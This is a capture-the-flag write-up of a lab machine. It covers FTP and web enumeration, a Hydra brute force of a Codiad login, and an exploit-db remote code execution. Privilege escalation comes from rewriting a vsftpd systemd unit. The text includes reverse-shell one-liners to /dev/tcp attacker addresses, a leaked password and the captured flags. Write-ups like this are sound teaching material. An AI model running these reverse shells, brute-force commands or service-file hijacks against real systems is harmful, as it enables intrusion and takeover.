Hello, It is my first post. From now I start to post my writeup/notes about CTF challenges from differents platforms to share you my approach.

Enumeration

Let’s scan ports :

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 02:C5:29:36:64:91 (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

62337  open  tcp -> HTTP -> Codiad 2.8.4 #thanks to masscan

I found FTP, then I connected in anonymous mode :

# Conntect to FTP
cd ...
get -

# File content 

Hey john,
I have reset the password as you have asked. Please use the default password to login. 
Also, please take care of the image file ;)
- drac.

According this file, we can guess john and drac are users of the machine

Web Enumeration :

Whatweb to check web components used by the website :

WhatWeb report for http://10.10.49.31
Status    : 405 Method Not Allowed
Title     : Error response
IP        : 10.10.49.31
Country   : RESERVED, ZZ

Summary   : HTTPServer[WebSockify Python/3.6.9], Python[3.6.9]

Detected Plugins:
[ HTTPServer ]
	HTTP server header string. This plugin also attempts to 
	identify the operating system from the server header. 

	String       : WebSockify Python/3.6.9 (from server string)

[ Python ]
	Python is a programming language that lets you work more 
	quickly and integrate your systems more effectively. You 
	can learn to use Python and see almost immediate gains in 
	productivity and lower maintenance costs. 

	Version      : 3.6.9
	Website     : http://www.python.org/

HTTP Headers:
	HTTP/1.1 405 Method Not Allowed
	Server: WebSockify Python/3.6.9
	Date: Fri, 06 Jan 2023 13:01:12 GMT
	Connection: close
	Content-Type: text/html;charset=utf-8
	Content-Length: 472

Gobuster to enumerate directories :

gobuster dir --url http://10.10.182.125 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt,json,yaml,csv
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.182.125
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt,json,yaml,csv
[+] Timeout:        10s
===============================================================
2023/01/06 12:55:18 Starting gobuster
===============================================================
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2023/01/06 13:06:35 Finished
===============================================================

I attempted a directory bruteforece on the codiad service :

gobuster dir --url http://10.10.182.125 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt,json,yaml,csv
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.182.125
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt,json,yaml,csv
[+] Timeout:        10s
===============================================================
2023/01/06 12:55:18 Starting gobuster
===============================================================
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2023/01/06 13:06:35 Finished
===============================================================

Earlier I found through my scan codiad on version 2.8.4.

Exploitation

Codiad has a login page, then I attempted to crack password of john and drac users. I stored john and drac into users.txt file and brute forced their password thanks to Hydra :

hydra  -L users.txt -P /usr/share/wordlists/rockyou.txt -v -s 62337 10.10.107.200 http-post-form "/components/user/controller.php?action=authenticate:username=^USER^&password=^PASS^&theme=default&language=fr:F={\"status\"\:\"error\",\"message\"\:\"Incorrect Username or Password\"}"
....
[62337][http-post-form] host: 10.10.107.200   login: john   password: password

To exploit codiad, I used the following exploit : exploitdb

This exploit allows me to have a reverse shell. First in a terminal I set up my reverse shell server :

echo 'bash -c "bash -i >/dev/tcp/10.10.130.96/9002 0>&1 2>&1"' | nc -lnvp 9001

Then, I triggered the rce :

python exploit.py http://10.10.107.200:62337/ john password 10.10.130.96 9001 linux

Post-Exploitation :

User flag :

After I got the machine, I checked the drac’s commands history and I got his password because he logged into mysql with the -p flag.

cat /home/drac/.bash_history

mysql -u drac -p 'Th3dRaCULa1sR3aL'

Then, I got the flag user :

cat user.txt 
02930d21a8eb009f6d26361b2d24a466

Privilege escalation to root :

I Attempted to see what I could run as root using sudo -l:

drac@ide:/tmp$ sudo -l
[sudo] password for drac: 
Matching Defaults entries for drac on ide:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart

I thought I could modify the vsftp service throught edition of /etc/systemd/system/vsftpd.service file but I could not write in this file. Then, In despair I launched linpeas and got the real service file config I must edit to gain root access :

/lib/systemd/system/vsftpd.service 

Gaining root access :

[Unit]
Description=vsftpd FTP server

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'sh -i >& /dev/tcp/10.10.191.61/9001 0>&1'

[Install]
WantedBy=multi-user.target

Setting up root reverse shell :

nc -lnvp 9001
# After restarting vsftp service (sudo /usr/sbin/service vsftpd restart)
cat /root/root.txt
ce258cb16f47f1c66f0b0b77f4e0fb8d -> the flag